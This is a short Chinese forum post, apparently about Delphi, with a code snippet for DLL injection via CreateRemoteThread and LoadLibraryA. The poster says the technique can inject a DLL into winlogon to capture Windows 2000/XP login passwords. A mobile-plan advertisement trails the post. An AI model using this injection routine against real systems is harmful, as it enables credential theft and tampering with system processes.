用delphi创建远程线程一年以前就做过了,甚至可以将一个dll插到winlogon里去获得2000/xp登录密码,当然,这里还要点技巧。 GetWindowThreadProcessId(hParent,@dwRemoteProcessId);
hRemoteProcess:=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
getmem(pszLibFileName,cb);
strcopy(pszLibFileName,pchar(ExtractFilePath(ParamStr(0))+'\shellapi.dll'));
pszLibFileRemote:=VirtualAllocEx(hRemoteProcess,NIL,cb,MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess,pszLibFileRemote,pszLibFileName,cb,pcb);
Freemem(pszLibFileName);
hkernel32:=GetModuleHandle('Kernel32.dll');
pfnStartAddr:=GetProcAddress(hkernel32,'LoadLibraryA');
hRemoteThread:=CreateRemoteThread(hRemoteProcess,NIL,0,pfnStartAddr,pszLibFileRemote,0,pcb);
WaitForSingleObject(hRemoteThread,INFINITE);
TerminateThread(hRemoteThread,0);
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货